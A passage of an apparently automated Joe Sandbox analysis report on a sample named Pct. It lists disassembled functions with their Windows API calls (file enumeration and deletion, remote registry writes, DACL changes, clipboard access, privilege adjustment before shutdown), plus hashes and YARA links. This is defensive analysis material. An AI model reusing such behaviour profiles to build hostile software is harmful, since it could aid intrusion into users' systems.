                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2CDD0
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C2CE24
                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C2CE49
                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C2CE60
                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C2CE87
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2CED3
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2CF16
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2CF6A
                                                                                                                                                    • Part of subcall function 00BE38C8: __woutput_l.LIBCMT ref: 00BE3921
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2CFB8
                                                                                                                                                    • Part of subcall function 00BE38C8: __flsbuf.LIBCMT ref: 00BE3943
                                                                                                                                                    • Part of subcall function 00BE38C8: __flsbuf.LIBCMT ref: 00BE395B
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2D007
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2D056
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2D0A5
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                  • API String ID: 3953360268-2428617273
                                                                                                                                                  • Opcode ID: 60c3fc9fe1877f9993ab6878fd5b44960858aa397a396b577b7c2cd8ff346887
                                                                                                                                                  • Instruction ID: 6830f2d755008a017c27ed37cf6ae4b406c2a9399102803d952e634027f2c34b
                                                                                                                                                  • Opcode Fuzzy Hash: 60c3fc9fe1877f9993ab6878fd5b44960858aa397a396b577b7c2cd8ff346887
                                                                                                                                                  • Instruction Fuzzy Hash: 6FA14CB1404344ABC710EBA4D996EAFB7ECEF94700F40096EF595C6191EB34EA48CB62
                                                                                                                                                  Function 00C2F5D8 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00C2F5F9
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2F60E
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2F625
                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00C2F637
                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 00C2F651
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2F669
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C2F674
                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C2F690
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2F6B7
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2F6CE
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2F6E0
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00C7B578), ref: 00C2F6FE
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2F708
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C2F715
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C2F727
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                  • String ID: *.*
                                                                                                                                                  • API String ID: 1803514871-438819550
                                                                                                                                                  • Opcode ID: 65e579e6ccc648ce2df35f327911d89dd9e2fc9f0f7630fb4a541635438e6cc1
                                                                                                                                                  • Instruction ID: ade495903027fa6ff763a50c269d364b49a1e9f9fbbcd3b20e9c15c313b0c44c
                                                                                                                                                  • Opcode Fuzzy Hash: 65e579e6ccc648ce2df35f327911d89dd9e2fc9f0f7630fb4a541635438e6cc1
                                                                                                                                                  • Instruction Fuzzy Hash: E831627554122D6ADB109BB5EC4DBDE77BCAF09722F204179F814E21A0EB34DE85CA60
                                                                                                                                                  Function 00C40EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C40FB3
                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00C50980,00000000,?,00000000,?,?), ref: 00C41021
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00C41069
                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00C410F2
                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00C41412
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C4141F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                                                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                  • API String ID: 536824911-966354055
                                                                                                                                                  • Opcode ID: 5ee44bb63e530f2739572e9cf9ef62c9a29a1df415d0a2cae89cabe79ee64800
                                                                                                                                                  • Instruction ID: a15f6a2718743ff8e46090fe0295c80bf1bd6db66a2b7e50a9d786caa5e641a6
                                                                                                                                                  • Opcode Fuzzy Hash: 5ee44bb63e530f2739572e9cf9ef62c9a29a1df415d0a2cae89cabe79ee64800
                                                                                                                                                  • Instruction Fuzzy Hash: 83024A756006119FC714EF25C891E2AB7E5FF88720B1489ADF89A9B362DB30ED41CB91
                                                                                                                                                  Function 00C2F735 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00C2F756
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2F76B
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2F782
                                                                                                                                                    • Part of subcall function 00C24875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C24890
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2F7B1
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C2F7BC
                                                                                                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00C2F7D8
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2F7FF
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2F816
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00C2F828
                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00C7B578), ref: 00C2F846
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C2F850
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C2F85D
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C2F86F
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                  • String ID: *.*
                                                                                                                                                  • API String ID: 1824444939-438819550
                                                                                                                                                  • Opcode ID: ea7bd096a3834359351d89bd5571bb980c7f58624d9638241dd446e56a0b1ae8
                                                                                                                                                  • Instruction ID: 4c150cb0f278bdb5fb40b6b55bd1c52e8a15a8518249cacf8a2cc31bf68d1d75
                                                                                                                                                  • Opcode Fuzzy Hash: ea7bd096a3834359351d89bd5571bb980c7f58624d9638241dd446e56a0b1ae8
                                                                                                                                                  • Instruction Fuzzy Hash: 0D31C57650026D6ADB10DBB5EC58BDE77BC9F0A321F2041B9E814E35E0DB70CF868A60
                                                                                                                                                  Function 00C188CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C18E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,00C18900,?,?,?), ref: 00C18E3C
                                                                                                                                                    • Part of subcall function 00C18E20: GetLastError.KERNEL32(?,00C18900,?,?,?), ref: 00C18E46
                                                                                                                                                    • Part of subcall function 00C18E20: GetProcessHeap.KERNEL32(00000008,?,?,00C18900,?,?,?), ref: 00C18E55
                                                                                                                                                    • Part of subcall function 00C18E20: HeapAlloc.KERNEL32(00000000,?,00C18900,?,?,?), ref: 00C18E5C
                                                                                                                                                    • Part of subcall function 00C18E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,00C18900,?,?,?), ref: 00C18E73
                                                                                                                                                    • Part of subcall function 00C18EBD: GetProcessHeap.KERNEL32(00000008,00C18916,00000000,00000000,?,00C18916,?), ref: 00C18EC9
                                                                                                                                                    • Part of subcall function 00C18EBD: HeapAlloc.KERNEL32(00000000,?,00C18916,?), ref: 00C18ED0
                                                                                                                                                    • Part of subcall function 00C18EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00C18916,?), ref: 00C18EE1
                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C18931
                                                                                                                                                  • _memset.LIBCMT ref: 00C18946
                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C18965
                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00C18976
                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00C189B3
                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C189CF
                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00C189EC
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00C189FB
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C18A02
                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C18A23
                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00C18A2A
                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C18A5B
                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C18A81
                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C18A95
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3996160137-0
                                                                                                                                                  • Opcode ID: 93c8e48880ccba47f4d367889b675154402acd64ddf1380f88c008a09164c828
                                                                                                                                                  • Instruction ID: 61d47701f4451bb7cce7e28c7a492fdaeebe927a089005f78946c7d57dbea588
                                                                                                                                                  • Opcode Fuzzy Hash: 93c8e48880ccba47f4d367889b675154402acd64ddf1380f88c008a09164c828
                                                                                                                                                  • Instruction Fuzzy Hash: 64615875900209BFDF00DFA1DC45BEEBB79FF45301F14812AE825E6290DB359A99EB60
                                                                                                                                                  Function 00C40A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C4147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C4040D,?,?), ref: 00C41491
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?,?,?), ref: 00C40B0C
                                                                                                                                                    • Part of subcall function 00BC4D37: __itow.LIBCMT ref: 00BC4D62
                                                                                                                                                    • Part of subcall function 00BC4D37: __swprintf.LIBCMT ref: 00BC4DAC
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C40BAB
                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C40C43
                                                                                                                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C40E82
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C40E8F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1240663315-0
                                                                                                                                                  • Opcode ID: 28f92304793f6f9c6dce56f77e6b0e453bdfe74d1db736a579e176f35c04b08f
                                                                                                                                                  • Instruction ID: c07ab7a64c28efc2a737c694bfab299d4a2ce4a7d6c7f4e43fb637c9c3fdfcb9
                                                                                                                                                  • Opcode Fuzzy Hash: 28f92304793f6f9c6dce56f77e6b0e453bdfe74d1db736a579e176f35c04b08f
                                                                                                                                                  • Instruction Fuzzy Hash: DEE15C31604211AFC714DF29C891E2ABBE9FF89314F14896DF99ADB2A1DB30ED41CB51
                                                                                                                                                  Function 00C2443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C24451
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2445E
                                                                                                                                                    • Part of subcall function 00BE38C8: __woutput_l.LIBCMT ref: 00BE3921
                                                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 00C24488
                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00C24494
                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 00C244A1
                                                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 00C244C1
                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00C244D3
                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00C244E2
                                                                                                                                                  • LockResource.KERNEL32(?), ref: 00C244EE
                                                                                                                                                  • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00C2454F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1433390588-0
                                                                                                                                                  • Opcode ID: 5c9db7c35a3c508ee4559447942a47659e252d687c904301f057180cfcb3669e
                                                                                                                                                  • Instruction ID: 93814ff7f01001fd36a76489af10a5b11d258894c8048f995da48a4251e656a3
                                                                                                                                                  • Opcode Fuzzy Hash: 5c9db7c35a3c508ee4559447942a47659e252d687c904301f057180cfcb3669e
                                                                                                                                                  • Instruction Fuzzy Hash: 4731D07150022AABDB199FA1EC48FBF7BADFF04301F104429F956E2550E774DA51CBA0
                                                                                                                                                  Function 00C34830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                                  • Opcode ID: c0aa28c21dc98293b1c423e0764d3da2946d3b8275b5f3cd8bcf683fe4884f01
                                                                                                                                                  • Instruction ID: 842842acade73aa3d213bf301857a0ce60c1406845586ebbf002db228fcf6b2d
                                                                                                                                                  • Opcode Fuzzy Hash: c0aa28c21dc98293b1c423e0764d3da2946d3b8275b5f3cd8bcf683fe4884f01
                                                                                                                                                  • Instruction Fuzzy Hash: AB218135201310AFDB15AF60EC59F6E77A8FF44722F208059F946EB2A1DB30AE40CB95
                                                                                                                                                  Function 00C23CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BE0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BD2A58,?,00008000), ref: 00BE02A4
                                                                                                                                                    • Part of subcall function 00C24FEC: GetFileAttributesW.KERNEL32(?,00C23BFE), ref: 00C24FED
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C23D96
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C23E3E
                                                                                                                                                  • MoveFileW.KERNEL32(?,?,?,?,?,?), ref: 00C23E51
                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C23E6E
                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C23E90
                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C23EAC
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                                                                                                  • String ID: \*.*
                                                                                                                                                  • API String ID: 4002782344-1173974218
                                                                                                                                                  • Opcode ID: fc8f91e8c53b5695d86ee9b24be218a1f26df96386546f8ba06feac21f7512f4
                                                                                                                                                  • Instruction ID: 74fb3a0907259e774e837aded8e64253a28b7748b25c88a0ab1bf3c27d4a1ad7
                                                                                                                                                  • Opcode Fuzzy Hash: fc8f91e8c53b5695d86ee9b24be218a1f26df96386546f8ba06feac21f7512f4
                                                                                                                                                  • Instruction Fuzzy Hash: 9951B13180015DAACF15EBE4EE929EDB7B9AF10301F2441A6E452B7192EF356F4DCB60
                                                                                                                                                  Function 00C2FA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C2FA83
                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00C2FB96
                                                                                                                                                    • Part of subcall function 00BC52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,00BCBCD4,?,?), ref: 00BC52E6
                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00C2FAB3
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2FAC7
                                                                                                                                                  • _wcscmp.LIBCMT ref: 00C2FAE2
                                                                                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 00C2FB80
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                                                                                  • String ID: *.*
                                                                                                                                                  • API String ID: 2185952417-438819550
                                                                                                                                                  • Opcode ID: a920a5212cf795f7566610e486ca0f9d9c2cbe29f4b2fc2a4f5abc09785b52b0
                                                                                                                                                  • Instruction ID: 2d0c58df66f5f59b2a2237fe78a85fbe4d3107f2710870e77888ee912808cbf4
                                                                                                                                                  • Opcode Fuzzy Hash: a920a5212cf795f7566610e486ca0f9d9c2cbe29f4b2fc2a4f5abc09785b52b0
                                                                                                                                                  • Instruction Fuzzy Hash: A8415E7194021EABCF14DF64DC59AEEBBB4FF05351F1485BAE814A2291EB309E85CF50
                                                                                                                                                  Function 00C25778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00C19399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C193E3
                                                                                                                                                    • Part of subcall function 00C19399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C19410
                                                                                                                                                    • Part of subcall function 00C19399: GetLastError.KERNEL32 ref: 00C1941D
                                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00C257B4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
